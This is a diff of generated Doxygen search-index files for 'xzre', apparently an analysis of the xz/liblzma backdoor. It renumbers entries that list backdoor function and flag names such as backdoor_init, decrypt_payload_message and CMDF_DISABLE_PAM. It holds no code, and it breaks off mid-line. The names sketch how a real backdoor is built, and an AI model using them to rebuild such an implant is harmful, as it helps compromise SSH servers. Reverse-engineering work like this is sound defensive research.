+ + diff --git a/search/classes_e.js b/search/classes_e.js new file mode 100644 index 0000000..e5b49a9 --- /dev/null +++ b/search/classes_e.js @@ -0,0 +1,4 @@ +var searchData= +[ + ['u_5fcmd_5farguments_5ft_331',['u_cmd_arguments_t',['../unionu__cmd__arguments__t.html',1,'']]] +]; diff --git a/search/enums_0.js b/search/enums_0.js index 39b8290..ee08b55 100644 --- a/search/enums_0.js +++ b/search/enums_0.js @@ -1,6 +1,6 @@ var searchData= [ - ['commandflags1_545',['CommandFlags1',['../xzre_8h.html#a5f8f63d8ae502ab76547c7b077cb067c',1,'xzre.h']]], - ['commandflags2_546',['CommandFlags2',['../xzre_8h.html#a408b28a8a0686c2ba0ede1e1b4208348',1,'xzre.h']]], - ['commandflags3_547',['CommandFlags3',['../xzre_8h.html#abe6f94ea5911ce9fe472717add623449',1,'xzre.h']]] + ['commandflags1_553',['CommandFlags1',['../xzre_8h.html#a5f8f63d8ae502ab76547c7b077cb067c',1,'xzre.h']]], + ['commandflags2_554',['CommandFlags2',['../xzre_8h.html#a408b28a8a0686c2ba0ede1e1b4208348',1,'xzre.h']]], + ['commandflags3_555',['CommandFlags3',['../xzre_8h.html#abe6f94ea5911ce9fe472717add623449',1,'xzre.h']]] ]; diff --git a/search/enums_1.js b/search/enums_1.js index f81d038..c46aa6b 100644 --- a/search/enums_1.js +++ b/search/enums_1.js @@ -1,4 +1,4 @@ var searchData= [ - ['elfid_548',['ElfId',['../xzre_8h.html#a3ed7f6d009d35ae3bdb830a7bb1e0289',1,'xzre.h']]] + ['elfid_556',['ElfId',['../xzre_8h.html#a3ed7f6d009d35ae3bdb830a7bb1e0289',1,'xzre.h']]] ]; diff --git a/search/enumvalues_0.js b/search/enumvalues_0.js index e059ef0..f27b876 100644 --- a/search/enumvalues_0.js +++ b/search/enumvalues_0.js @@ -1,15 +1,15 @@ var searchData= [ - ['cmdf_5f8bytes_549',['CMDF_8BYTES',['../xzre_8h.html#a5f8f63d8ae502ab76547c7b077cb067caef08c4a90ed6e0457d25d2c229bd375a',1,'xzre.h']]], - ['cmdf_5fchange_5fmonitor_5freq_550',['CMDF_CHANGE_MONITOR_REQ',['../xzre_8h.html#a408b28a8a0686c2ba0ede1e1b4208348a503e908611a2b460cac82b916acf3d68',1,'xzre.h']]], - ['cmdf_5fcontinuation_551',['CMDF_CONTINUATION',['../xzre_8h.html#a408b28a8a0686c2ba0ede1e1b4208348ae700a962c8a6f21e7e4f6b1a461e0f71',1,'xzre.h']]], - ['cmdf_5fdisable_5fpam_552',['CMDF_DISABLE_PAM',['../xzre_8h.html#a5f8f63d8ae502ab76547c7b077cb067cac37705603ed342dbf4c076c037357891',1,'xzre.h']]], - ['cmdf_5fimpersonate_553',['CMDF_IMPERSONATE',['../xzre_8h.html#a408b28a8a0686c2ba0ede1e1b4208348ad62079a782b410d925454cf4c67cad43',1,'xzre.h']]], - ['cmdf_5fmonitor_5freq_5fval_554',['CMDF_MONITOR_REQ_VAL',['../xzre_8h.html#abe6f94ea5911ce9fe472717add623449a77a33c8da10ebea573e1bc4408818f80',1,'xzre.h']]], - ['cmdf_5fno_5fextended_5fsize_555',['CMDF_NO_EXTENDED_SIZE',['../xzre_8h.html#a5f8f63d8ae502ab76547c7b077cb067ca68a7eabd7b06721e278cce39e2035a44',1,'xzre.h']]], - ['cmdf_5fpselect_556',['CMDF_PSELECT',['../xzre_8h.html#a408b28a8a0686c2ba0ede1e1b4208348a955fb3640af5b4d2852a6f2b869d9940',1,'xzre.h']]], - ['cmdf_5fsetlogmask_557',['CMDF_SETLOGMASK',['../xzre_8h.html#a5f8f63d8ae502ab76547c7b077cb067ca3616e0158ba9d48631cbdf2f9ff3eb7e',1,'xzre.h']]], - ['cmdf_5fsocket_5findex_558',['CMDF_SOCKET_INDEX',['../xzre_8h.html#a5f8f63d8ae502ab76547c7b077cb067ca9cdc5226f403f8ed3a9b492f90e2c577',1,'xzre.h']]], - ['cmdf_5fsocket_5fnum_559',['CMDF_SOCKET_NUM',['../xzre_8h.html#abe6f94ea5911ce9fe472717add623449a5cfa47555179689d0b49f0403ac02a96',1,'xzre.h']]], - ['cmdf_5fsockfd_5fmask_560',['CMDF_SOCKFD_MASK',['../xzre_8h.html#a408b28a8a0686c2ba0ede1e1b4208348a9a5a5b13e6e008d71a6f610bb0ef83e5',1,'xzre.h']]] + ['cmdf_5f8bytes_557',['CMDF_8BYTES',['../xzre_8h.html#a5f8f63d8ae502ab76547c7b077cb067caef08c4a90ed6e0457d25d2c229bd375a',1,'xzre.h']]], + ['cmdf_5fchange_5fmonitor_5freq_558',['CMDF_CHANGE_MONITOR_REQ',['../xzre_8h.html#a408b28a8a0686c2ba0ede1e1b4208348a503e908611a2b460cac82b916acf3d68',1,'xzre.h']]], + ['cmdf_5fcontinuation_559',['CMDF_CONTINUATION',['../xzre_8h.html#a408b28a8a0686c2ba0ede1e1b4208348ae700a962c8a6f21e7e4f6b1a461e0f71',1,'xzre.h']]], + ['cmdf_5fdisable_5fpam_560',['CMDF_DISABLE_PAM',['../xzre_8h.html#a5f8f63d8ae502ab76547c7b077cb067cac37705603ed342dbf4c076c037357891',1,'xzre.h']]], + ['cmdf_5fimpersonate_561',['CMDF_IMPERSONATE',['../xzre_8h.html#a408b28a8a0686c2ba0ede1e1b4208348ad62079a782b410d925454cf4c67cad43',1,'xzre.h']]], + ['cmdf_5fmonitor_5freq_5fval_562',['CMDF_MONITOR_REQ_VAL',['../xzre_8h.html#abe6f94ea5911ce9fe472717add623449a77a33c8da10ebea573e1bc4408818f80',1,'xzre.h']]], + ['cmdf_5fno_5fextended_5fsize_563',['CMDF_NO_EXTENDED_SIZE',['../xzre_8h.html#a5f8f63d8ae502ab76547c7b077cb067ca68a7eabd7b06721e278cce39e2035a44',1,'xzre.h']]], + ['cmdf_5fpselect_564',['CMDF_PSELECT',['../xzre_8h.html#a408b28a8a0686c2ba0ede1e1b4208348a955fb3640af5b4d2852a6f2b869d9940',1,'xzre.h']]], + ['cmdf_5fsetlogmask_565',['CMDF_SETLOGMASK',['../xzre_8h.html#a5f8f63d8ae502ab76547c7b077cb067ca3616e0158ba9d48631cbdf2f9ff3eb7e',1,'xzre.h']]], + ['cmdf_5fsocket_5findex_566',['CMDF_SOCKET_INDEX',['../xzre_8h.html#a5f8f63d8ae502ab76547c7b077cb067ca9cdc5226f403f8ed3a9b492f90e2c577',1,'xzre.h']]], + ['cmdf_5fsocket_5fnum_567',['CMDF_SOCKET_NUM',['../xzre_8h.html#abe6f94ea5911ce9fe472717add623449a5cfa47555179689d0b49f0403ac02a96',1,'xzre.h']]], + ['cmdf_5fsockfd_5fmask_568',['CMDF_SOCKFD_MASK',['../xzre_8h.html#a408b28a8a0686c2ba0ede1e1b4208348a9a5a5b13e6e008d71a6f610bb0ef83e5',1,'xzre.h']]] ]; diff --git a/search/enumvalues_1.js b/search/enumvalues_1.js index ed245a4..be9d629 100644 --- a/search/enumvalues_1.js +++ b/search/enumvalues_1.js @@ -1,4 +1,4 @@ var searchData= [ - ['x_5felf_5fmain_561',['X_ELF_MAIN',['../xzre_8h.html#a3ed7f6d009d35ae3bdb830a7bb1e0289aba3b2cdb9ea0a8c79650d8c305d93898',1,'xzre.h']]] + ['x_5felf_5fmain_569',['X_ELF_MAIN',['../xzre_8h.html#a3ed7f6d009d35ae3bdb830a7bb1e0289aba3b2cdb9ea0a8c79650d8c305d93898',1,'xzre.h']]] ]; diff --git a/search/files_0.js b/search/files_0.js index b5c6c39..8dc7fa3 100644 --- a/search/files_0.js +++ b/search/files_0.js @@ -1,4 +1,4 @@ var searchData= [ - ['ssh_5fpatch_2ec_326',['ssh_patch.c',['../ssh__patch_8c.html',1,'']]] + ['ssh_5fpatch_2ec_332',['ssh_patch.c',['../ssh__patch_8c.html',1,'']]] ]; diff --git a/search/files_1.js b/search/files_1.js index b926901..6e70509 100644 --- a/search/files_1.js +++ b/search/files_1.js @@ -1,4 +1,4 @@ var searchData= [ - ['xzre_2eh_327',['xzre.h',['../xzre_8h.html',1,'']]] + ['xzre_2eh_333',['xzre.h',['../xzre_8h.html',1,'']]] ]; diff --git a/search/functions_0.js b/search/functions_0.js index b98f375..cd7ef12 100644 --- a/search/functions_0.js +++ b/search/functions_0.js @@ -1,5 +1,5 @@ var searchData= [ - ['_5fcpuid_5fgcc_328',['_cpuid_gcc',['../xzre_8h.html#a93ca9203c23a4ab6b11ad972e77d6d80',1,'xzre.h']]], - ['_5fget_5fcpuid_5fmodified_329',['_get_cpuid_modified',['../xzre_8h.html#a954b1d109f7b7576c4d904a1ef5de2c9',1,'xzre.h']]] + ['_5fcpuid_5fgcc_334',['_cpuid_gcc',['../xzre_8h.html#a93ca9203c23a4ab6b11ad972e77d6d80',1,'xzre.h']]], + ['_5fget_5fcpuid_5fmodified_335',['_get_cpuid_modified',['../xzre_8h.html#a954b1d109f7b7576c4d904a1ef5de2c9',1,'xzre.h']]] ]; diff --git a/search/functions_1.js b/search/functions_1.js index 9d81092..b616ed3 100644 --- a/search/functions_1.js +++ b/search/functions_1.js @@ -1,9 +1,9 @@ var searchData= [ - ['backdoor_5fentry_330',['backdoor_entry',['../xzre_8h.html#a851b6ae19abb6961d0c6c21f382e0abc',1,'xzre.h']]], - ['backdoor_5finit_331',['backdoor_init',['../xzre_8h.html#a4662813f09936a772b6682e8bdd0be62',1,'xzre.h']]], - ['backdoor_5finit_5fstage2_332',['backdoor_init_stage2',['../xzre_8h.html#a8ab85586c2cbdd03ee2f734b92e3e3d6',1,'xzre.h']]], - ['backdoor_5fsetup_333',['backdoor_setup',['../xzre_8h.html#a229ee0bd4111363061bc4230bc1f6423',1,'xzre.h']]], - ['backdoor_5fsymbind64_334',['backdoor_symbind64',['../xzre_8h.html#a60ba9b591b9f0b10a78ea2136a0a3adc',1,'xzre.h']]], - ['bignum_5fserialize_335',['bignum_serialize',['../xzre_8h.html#a966b189602e0af0053053e8405d39fa2',1,'xzre.h']]] + ['backdoor_5fentry_336',['backdoor_entry',['../xzre_8h.html#a851b6ae19abb6961d0c6c21f382e0abc',1,'xzre.h']]], + ['backdoor_5finit_337',['backdoor_init',['../xzre_8h.html#a4662813f09936a772b6682e8bdd0be62',1,'xzre.h']]], + ['backdoor_5finit_5fstage2_338',['backdoor_init_stage2',['../xzre_8h.html#a8ab85586c2cbdd03ee2f734b92e3e3d6',1,'xzre.h']]], + ['backdoor_5fsetup_339',['backdoor_setup',['../xzre_8h.html#a229ee0bd4111363061bc4230bc1f6423',1,'xzre.h']]], + ['backdoor_5fsymbind64_340',['backdoor_symbind64',['../xzre_8h.html#a60ba9b591b9f0b10a78ea2136a0a3adc',1,'xzre.h']]], + ['bignum_5fserialize_341',['bignum_serialize',['../xzre_8h.html#a966b189602e0af0053053e8405d39fa2',1,'xzre.h']]] ]; diff --git a/search/functions_2.js b/search/functions_2.js index 9d068fe..b66d004 100644 --- a/search/functions_2.js +++ b/search/functions_2.js @@ -1,8 +1,8 @@ var searchData= [ - ['chacha_5fdecrypt_336',['chacha_decrypt',['../xzre_8h.html#a8eb41e1828a73dd4ce8f82a0d42dceb5',1,'xzre.h']]], - ['check_5fbackdoor_5fstate_337',['check_backdoor_state',['../xzre_8h.html#a8412cd4edc81e13f4041a11dd7a59f33',1,'xzre.h']]], - ['contains_5fnull_5fpointers_338',['contains_null_pointers',['../xzre_8h.html#a49d6b781406209d412b2dfadd3c7d95f',1,'xzre.h']]], - ['count_5fbits_339',['count_bits',['../xzre_8h.html#a9ec1df74592643b26839ecbe320d36ae',1,'xzre.h']]], - ['count_5fpointers_340',['count_pointers',['../xzre_8h.html#a844d7f178bc2d12ee2dbf33985736fa0',1,'xzre.h']]] + ['chacha_5fdecrypt_342',['chacha_decrypt',['../xzre_8h.html#a8eb41e1828a73dd4ce8f82a0d42dceb5',1,'xzre.h']]], + ['check_5fbackdoor_5fstate_343',['check_backdoor_state',['../xzre_8h.html#a8412cd4edc81e13f4041a11dd7a59f33',1,'xzre.h']]], + ['contains_5fnull_5fpointers_344',['contains_null_pointers',['../xzre_8h.html#a49d6b781406209d412b2dfadd3c7d95f',1,'xzre.h']]], + ['count_5fbits_345',['count_bits',['../xzre_8h.html#a9ec1df74592643b26839ecbe320d36ae',1,'xzre.h']]], + ['count_5fpointers_346',['count_pointers',['../xzre_8h.html#a844d7f178bc2d12ee2dbf33985736fa0',1,'xzre.h']]] ]; diff --git a/search/functions_3.js b/search/functions_3.js index 9c4fa28..a655520 100644 --- a/search/functions_3.js +++ b/search/functions_3.js @@ -1,6 +1,6 @@ var searchData= [ - ['decrypt_5fpayload_5fmessage_341',['decrypt_payload_message',['../xzre_8h.html#a91ced8a70c0e916ae8289e4ad77fbd47',1,'xzre.h']]], - ['dsa_5fkey_5fhash_342',['dsa_key_hash',['../xzre_8h.html#a1e6926b448d83ad3517bd38a954fe762',1,'xzre.h']]], - ['dummy_5ftls_5fget_5faddr_343',['dummy_tls_get_addr',['../xzre_8h.html#a0cbdcbe6fe49e7d3122630082cd84f34',1,'xzre.h']]] + ['decrypt_5fpayload_5fmessage_347',['decrypt_payload_message',['../xzre_8h.html#a91ced8a70c0e916ae8289e4ad77fbd47',1,'xzre.h']]], + ['dsa_5fkey_5fhash_348',['dsa_key_hash',['../xzre_8h.html#a1e6926b448d83ad3517bd38a954fe762',1,'xzre.h']]], + ['dummy_5ftls_5fget_5faddr_349',['dummy_tls_get_addr',['../xzre_8h.html#a0cbdcbe6fe49e7d3122630082cd84f34',1,'xzre.h']]] ]; diff --git a/search/functions_4.js b/search/functions_4.js index 0fe8509..7f77ed0 100644 --- a/search/functions_4.js +++ b/search/functions_4.js @@ -1,18 +1,18 @@ var searchData= [ - ['elf_5fcontains_5fvaddr_344',['elf_contains_vaddr',['../xzre_8h.html#a2bf5f1627236a90a54515265280e8354',1,'xzre.h']]], - ['elf_5fcontains_5fvaddr_5frelro_345',['elf_contains_vaddr_relro',['../xzre_8h.html#a2b6f96960f68c8cd69c6bb5bce25426b',1,'xzre.h']]], - ['elf_5ffind_5ffunction_5fpointer_346',['elf_find_function_pointer',['../xzre_8h.html#a02157f429658403951e2f41eb0e01117',1,'xzre.h']]], - ['elf_5ffind_5fstring_347',['elf_find_string',['../xzre_8h.html#ad86c0039d3a08468f5cf7187662ebab9',1,'xzre.h']]], - ['elf_5ffind_5fstring_5freference_348',['elf_find_string_reference',['../xzre_8h.html#a6ac7b2035eee3a9ffcceee0f9290c2e1',1,'xzre.h']]], - ['elf_5ffind_5fstring_5freferences_349',['elf_find_string_references',['../xzre_8h.html#a977d8b72a5f81675c76838347747d094',1,'xzre.h']]], - ['elf_5fget_5fcode_5fsegment_350',['elf_get_code_segment',['../xzre_8h.html#a18845fc4614f60083817db417dc32a13',1,'xzre.h']]], - ['elf_5fget_5fdata_5fsegment_351',['elf_get_data_segment',['../xzre_8h.html#a52148c8b1da2a37036e7975ea299117b',1,'xzre.h']]], - ['elf_5fget_5fgot_5fsymbol_352',['elf_get_got_symbol',['../xzre_8h.html#acb54dcbcba1c88075c523678a0d0dbda',1,'xzre.h']]], - ['elf_5fget_5fplt_5fsymbol_353',['elf_get_plt_symbol',['../xzre_8h.html#acbe9201dea64d4ae8112803f8af95985',1,'xzre.h']]], - ['elf_5fget_5freloc_5fsymbol_354',['elf_get_reloc_symbol',['../xzre_8h.html#a244da0ace01c1812168a0f7bb48bfd3b',1,'xzre.h']]], - ['elf_5fget_5frodata_5fsegment_355',['elf_get_rodata_segment',['../xzre_8h.html#a55e085fd878446cf655c657491b9d522',1,'xzre.h']]], - ['elf_5fparse_356',['elf_parse',['../xzre_8h.html#a049328971f4e99ce954d5e0346fee6d7',1,'xzre.h']]], - ['elf_5fsymbol_5fget_357',['elf_symbol_get',['../xzre_8h.html#a9d2747f12c29ef6eae1cc4b09f3cc5f7',1,'xzre.h']]], - ['elf_5fsymbol_5fget_5faddr_358',['elf_symbol_get_addr',['../xzre_8h.html#a099c6531c0b9aaf2a3caf6b001fa5109',1,'xzre.h']]] + ['elf_5fcontains_5fvaddr_350',['elf_contains_vaddr',['../xzre_8h.html#a2bf5f1627236a90a54515265280e8354',1,'xzre.h']]], + ['elf_5fcontains_5fvaddr_5frelro_351',['elf_contains_vaddr_relro',['../xzre_8h.html#a2b6f96960f68c8cd69c6bb5bce25426b',1,'xzre.h']]], + ['elf_5ffind_5ffunction_5fpointer_352',['elf_find_function_pointer',['../xzre_8h.html#a02157f429658403951e2f41eb0e01117',1,'xzre.h']]], + ['elf_5ffind_5fstring_353',['elf_find_string',['../xzre_8h.html#ad86c0039d3a08468f5cf7187662ebab9',1,'xzre.h']]], + ['elf_5ffind_5fstring_5freference_354',['elf_find_string_reference',['../xzre_8h.html#a6ac7b2035eee3a9ffcceee0f9290c2e1',1,'xzre.h']]], + ['elf_5ffind_5fstring_5freferences_355',['elf_find_string_references',['../xzre_8h.html#a977d8b72a5f81675c76838347747d094',1,'xzre.h']]], + ['elf_5fget_5fcode_5fsegment_356',['elf_get_code_segment',['../xzre_8h.html#a18845fc4614f60083817db417dc32a13',1,'xzre.h']]], + ['elf_5fget_5fdata_5fsegment_357',['elf_get_data_segment',['../xzre_8h.html#a52148c8b1da2a37036e7975ea299117b',1,'xzre.h']]], + ['elf_5fget_5fgot_5fsymbol_358',['elf_get_got_symbol',['../xzre_8h.html#acb54dcbcba1c88075c523678a0d0dbda',1,'xzre.h']]], + ['elf_5fget_5fplt_5fsymbol_359',['elf_get_plt_symbol',['../xzre_8h.html#acbe9201dea64d4ae8112803f8af95985',1,'xzre.h']]], + ['elf_5fget_5freloc_5fsymbol_360',['elf_get_reloc_symbol',['../xzre_8h.html#a244da0ace01c1812168a0f7bb48bfd3b',1,'xzre.h']]], + ['elf_5fget_5frodata_5fsegment_361',['elf_get_rodata_segment',['../xzre_8h.html#a55e085fd878446cf655c657491b9d522',1,'xzre.h']]], + ['elf_5fparse_362',['elf_parse',['../xzre_8h.html#a049328971f4e99ce954d5e0346fee6d7',1,'xzre.h']]], + ['elf_5fsymbol_5fget_363',['elf_symbol_get',['../xzre_8h.html#a9d2747f12c29ef6eae1cc4b09f3cc5f7',1,'xzre.h']]], + ['elf_5fsymbol_5fget_5faddr_364',['elf_symbol_get_addr',['../xzre_8h.html#a099c6531c0b9aaf2a3caf6b001fa5109',1,'xzre.h']]] ]; diff --git a/search/functions_5.js b/search/functions_5.js index 3c5107d..1fa7778 100644 --- a/search/functions_5.js +++ b/search/functions_5.js @@ -1,24 +1,24 @@ var searchData= [ - ['fake_5flzma_5falloc_359',['fake_lzma_alloc',['../xzre_8h.html#aeb6b7e7363a9d706fdd3704ef5faf584',1,'xzre.h']]], - ['fake_5flzma_5ffree_360',['fake_lzma_free',['../xzre_8h.html#a5565761b59b3ef6786b83a9b50f72b17',1,'xzre.h']]], - ['fd_5fread_361',['fd_read',['../xzre_8h.html#a443ee065f54857cd4c559963df5a7b85',1,'xzre.h']]], - ['fd_5fwrite_362',['fd_write',['../xzre_8h.html#a1c7515ae18e8ded5ffe02d66b9f6bffb',1,'xzre.h']]], - ['find_5fadd_5finstruction_5fwith_5fmem_5foperand_363',['find_add_instruction_with_mem_operand',['../xzre_8h.html#a683636baae409d1b74ea2c216e2ba107',1,'xzre.h']]], - ['find_5fcall_5finstruction_364',['find_call_instruction',['../xzre_8h.html#a41fada894916f4c67d59090ff57aead1',1,'xzre.h']]], - ['find_5fdl_5faudit_5foffsets_365',['find_dl_audit_offsets',['../xzre_8h.html#a8847a8cb7f015796a8fbd59cb7a18248',1,'xzre.h']]], - ['find_5fdl_5fnaudit_366',['find_dl_naudit',['../xzre_8h.html#a18543737f1eaf3cb1288d0c57c1f0a65',1,'xzre.h']]], - ['find_5ffunction_367',['find_function',['../xzre_8h.html#adb94193174339f9eae22428308d46c33',1,'xzre.h']]], - ['find_5ffunction_5fprologue_368',['find_function_prologue',['../xzre_8h.html#a81a6f3d01ea6057c942052321b92c533',1,'xzre.h']]], - ['find_5finstruction_5fwith_5fmem_5foperand_369',['find_instruction_with_mem_operand',['../xzre_8h.html#a60c226501adb1a2d3213484f651ff23b',1,'xzre.h']]], - ['find_5finstruction_5fwith_5fmem_5foperand_5fex_370',['find_instruction_with_mem_operand_ex',['../xzre_8h.html#a1c8a36d89bf4e57077a56611e9aeb470',1,'xzre.h']]], - ['find_5flea_5finstruction_371',['find_lea_instruction',['../xzre_8h.html#aea85a14166f11bb956c7862c2a66571e',1,'xzre.h']]], - ['find_5flea_5finstruction_5fwith_5fmem_5foperand_372',['find_lea_instruction_with_mem_operand',['../xzre_8h.html#a6e76946a37fb256974942a542373e421',1,'xzre.h']]], - ['find_5flink_5fmap_5fl_5faudit_5fany_5fplt_373',['find_link_map_l_audit_any_plt',['../xzre_8h.html#a2d980185c135b2dd9bc69c099ba60c25',1,'xzre.h']]], - ['find_5flink_5fmap_5fl_5faudit_5fany_5fplt_5fbitmask_374',['find_link_map_l_audit_any_plt_bitmask',['../xzre_8h.html#a82817ae0ac4e7e9a7ded04c0fa16ed9c',1,'xzre.h']]], - ['find_5flink_5fmap_5fl_5fname_375',['find_link_map_l_name',['../xzre_8h.html#a17824cde912b4de5dd68530dcbf9d42c',1,'xzre.h']]], - ['find_5fmov_5finstruction_376',['find_mov_instruction',['../xzre_8h.html#a3ab8cd040932beaf3ec377a753bfece0',1,'xzre.h']]], - ['find_5fmov_5flea_5finstruction_377',['find_mov_lea_instruction',['../xzre_8h.html#ae9718452d28f67f46d046c02c0125148',1,'xzre.h']]], - ['find_5freg2reg_5finstruction_378',['find_reg2reg_instruction',['../xzre_8h.html#aed0391d07e4413f5a13e1ec2940c94ea',1,'xzre.h']]], - ['find_5fstring_5freference_379',['find_string_reference',['../xzre_8h.html#a78aba1d370c6519777e637f1ed7b7c14',1,'xzre.h']]] + ['fake_5flzma_5falloc_365',['fake_lzma_alloc',['../xzre_8h.html#aeb6b7e7363a9d706fdd3704ef5faf584',1,'xzre.h']]], + ['fake_5flzma_5ffree_366',['fake_lzma_free',['../xzre_8h.html#a5565761b59b3ef6786b83a9b50f72b17',1,'xzre.h']]], + ['fd_5fread_367',['fd_read',['../xzre_8h.html#a443ee065f54857cd4c559963df5a7b85',1,'xzre.h']]], + ['fd_5fwrite_368',['fd_write',['../xzre_8h.html#a1c7515ae18e8ded5ffe02d66b9f6bffb',1,'xzre.h']]], + ['find_5fadd_5finstruction_5fwith_5fmem_5foperand_369',['find_add_instruction_with_mem_operand',['../xzre_8h.html#a683636baae409d1b74ea2c216e2ba107',1,'xzre.h']]], + ['find_5fcall_5finstruction_370',['find_call_instruction',['../xzre_8h.html#a41fada894916f4c67d59090ff57aead1',1,'xzre.h']]], + ['find_5fdl_5faudit_5foffsets_371',['find_dl_audit_offsets',['../xzre_8h.html#a8847a8cb7f015796a8fbd59cb7a18248',1,'xzre.h']]], + ['find_5fdl_5fnaudit_372',['find_dl_naudit',['../xzre_8h.html#a18543737f1eaf3cb1288d0c57c1f0a65',1,'xzre.h']]], + ['find_5ffunction_373',['find_function',['../xzre_8h.html#adb94193174339f9eae22428308d46c33',1,'xzre.h']]], + ['find_5ffunction_5fprologue_374',['find_function_prologue',['../xzre_8h.html#a81a6f3d01ea6057c942052321b92c533',1,'xzre.h']]], + ['find_5finstruction_5fwith_5fmem_5foperand_375',['find_instruction_with_mem_operand',['../xzre_8h.html#a60c226501adb1a2d3213484f651ff23b',1,'xzre.h']]], + ['find_5finstruction_5fwith_5fmem_5foperand_5fex_376',['find_instruction_with_mem_operand_ex',['../xzre_8h.html#a1c8a36d89bf4e57077a56611e9aeb470',1,'xzre.h']]], + ['find_5flea_5finstruction_377',['find_lea_instruction',['../xzre_8h.html#aea85a14166f11bb956c7862c2a66571e',1,'xzre.h']]], + ['find_5flea_5finstruction_5fwith_5fmem_5foperand_378',['find_lea_instruction_with_mem_operand',['../xzre_8h.html#a6e76946a37fb256974942a542373e421',1,'xzre.h']]], + ['find_5flink_5fmap_5fl_5faudit_5fany_5fplt_379',['find_link_map_l_audit_any_plt',['../xzre_8h.html#a2d980185c135b2dd9bc69c099ba60c25',1,'xzre.h']]], + ['find_5flink_5fmap_5fl_5faudit_5fany_5fplt_5fbitmask_380',['find_link_map_l_audit_any_plt_bitmask',['../xzre_8h.html#a82817ae0ac4e7e9a7ded04c0fa16ed9c',1,'xzre.h']]], + ['find_5flink_5fmap_5fl_5fname_381',['find_link_map_l_name',['../xzre_8h.html#a17824cde912b4de5dd68530dcbf9d42c',1,'xzre.h']]], + ['find_5fmov_5finstruction_382',['find_mov_instruction',['../xzre_8h.html#a3ab8cd040932beaf3ec377a753bfece0',1,'xzre.h']]], + ['find_5fmov_5flea_5finstruction_383',['find_mov_lea_instruction',['../xzre_8h.html#ae9718452d28f67f46d046c02c0125148',1,'xzre.h']]], + ['find_5freg2reg_5finstruction_384',['find_reg2reg_instruction',['../xzre_8h.html#aed0391d07e4413f5a13e1ec2940c94ea',1,'xzre.h']]], + ['find_5fstring_5freference_385',['find_string_reference',['../xzre_8h.html#a78aba1d370c6519777e637f1ed7b7c14',1,'xzre.h']]] ]; diff --git a/search/functions_6.js b/search/functions_6.js index 088757c..e74c86c 100644 --- a/search/functions_6.js +++ b/search/functions_6.js @@ -1,10 +1,10 @@ var searchData= [ - ['get_5fcpuid_5fgot_5findex_380',['get_cpuid_got_index',['../xzre_8h.html#aee7738c9cab5f6733c666e0a20e5ba99',1,'xzre.h']]], - ['get_5felf_5ffunctions_5faddress_381',['get_elf_functions_address',['../xzre_8h.html#ae74ae3bc755debdef566fa9b24cf8dd7',1,'xzre.h']]], - ['get_5fgot_5foffset_382',['get_got_offset',['../xzre_8h.html#ad33792d2db40b95a7b434081d1608ca4',1,'xzre.h']]], - ['get_5flzma_5fallocator_383',['get_lzma_allocator',['../xzre_8h.html#afca457dee8895eff6b7fdeffd6bc279a',1,'xzre.h']]], - ['get_5flzma_5fallocator_5faddress_384',['get_lzma_allocator_address',['../xzre_8h.html#a048b695303b409f486861de0c24d6097',1,'xzre.h']]], - ['get_5fstring_5fid_385',['get_string_id',['../xzre_8h.html#a6189320317764e3344934873b58b30b1',1,'xzre.h']]], - ['get_5ftls_5fget_5faddr_5frandom_5fsymbol_5fgot_5foffset_386',['get_tls_get_addr_random_symbol_got_offset',['../xzre_8h.html#ae20580c7a069afb3b578f060582867df',1,'xzre.h']]] + ['get_5fcpuid_5fgot_5findex_386',['get_cpuid_got_index',['../xzre_8h.html#aee7738c9cab5f6733c666e0a20e5ba99',1,'xzre.h']]], + ['get_5felf_5ffunctions_5faddress_387',['get_elf_functions_address',['../xzre_8h.html#ae74ae3bc755debdef566fa9b24cf8dd7',1,'xzre.h']]], + ['get_5fgot_5foffset_388',['get_got_offset',['../xzre_8h.html#ad33792d2db40b95a7b434081d1608ca4',1,'xzre.h']]], + ['get_5flzma_5fallocator_389',['get_lzma_allocator',['../xzre_8h.html#afca457dee8895eff6b7fdeffd6bc279a',1,'xzre.h']]], + ['get_5flzma_5fallocator_5faddress_390',['get_lzma_allocator_address',['../xzre_8h.html#a048b695303b409f486861de0c24d6097',1,'xzre.h']]], + ['get_5fstring_5fid_391',['get_string_id',['../xzre_8h.html#a6189320317764e3344934873b58b30b1',1,'xzre.h']]], + ['get_5ftls_5fget_5faddr_5frandom_5fsymbol_5fgot_5foffset_392',['get_tls_get_addr_random_symbol_got_offset',['../xzre_8h.html#ae20580c7a069afb3b578f060582867df',1,'xzre.h']]] ]; diff --git a/search/functions_7.js b/search/functions_7.js index 356393a..2656e0e 100644 --- a/search/functions_7.js +++ b/search/functions_7.js @@ -1,10 +1,10 @@ var searchData= [ - ['init_5felf_5fentry_5fctx_387',['init_elf_entry_ctx',['../xzre_8h.html#abf19222b4917f772ad487a2970dd51ec',1,'xzre.h']]], - ['init_5fhook_5ffunctions_388',['init_hook_functions',['../xzre_8h.html#abbcfd61778019372e0cabdf79b98824d',1,'xzre.h']]], - ['init_5fldso_5fctx_389',['init_ldso_ctx',['../xzre_8h.html#a31d16cd16f66f61d34ff686d73464181',1,'xzre.h']]], - ['is_5fendbr64_5finstruction_390',['is_endbr64_instruction',['../xzre_8h.html#a544d2cf67930e0fcd9f9ff37239a4c70',1,'xzre.h']]], - ['is_5fgnu_5frelro_391',['is_gnu_relro',['../xzre_8h.html#aae4bd899725c9e0825517734783f0433',1,'xzre.h']]], - ['is_5fpayload_5fmessage_392',['is_payload_message',['../xzre_8h.html#a0c558b4d23018ab4e177dfd14f186be9',1,'xzre.h']]], - ['is_5frange_5fmapped_393',['is_range_mapped',['../xzre_8h.html#a5d94ba8c95f0333dc53ef8432156b0ca',1,'xzre.h']]] + ['init_5felf_5fentry_5fctx_393',['init_elf_entry_ctx',['../xzre_8h.html#abf19222b4917f772ad487a2970dd51ec',1,'xzre.h']]], + ['init_5fhook_5ffunctions_394',['init_hook_functions',['../xzre_8h.html#abbcfd61778019372e0cabdf79b98824d',1,'xzre.h']]], + ['init_5fldso_5fctx_395',['init_ldso_ctx',['../xzre_8h.html#a31d16cd16f66f61d34ff686d73464181',1,'xzre.h']]], + ['is_5fendbr64_5finstruction_396',['is_endbr64_instruction',['../xzre_8h.html#a544d2cf67930e0fcd9f9ff37239a4c70',1,'xzre.h']]], + ['is_5fgnu_5frelro_397',['is_gnu_relro',['../xzre_8h.html#aae4bd899725c9e0825517734783f0433',1,'xzre.h']]], + ['is_5fpayload_5fmessage_398',['is_payload_message',['../xzre_8h.html#a0c558b4d23018ab4e177dfd14f186be9',1,'xzre.h']]], + ['is_5frange_5fmapped_399',['is_range_mapped',['../xzre_8h.html#a5d94ba8c95f0333dc53ef8432156b0ca',1,'xzre.h']]] ]; diff --git a/search/functions_8.js b/search/functions_8.js index 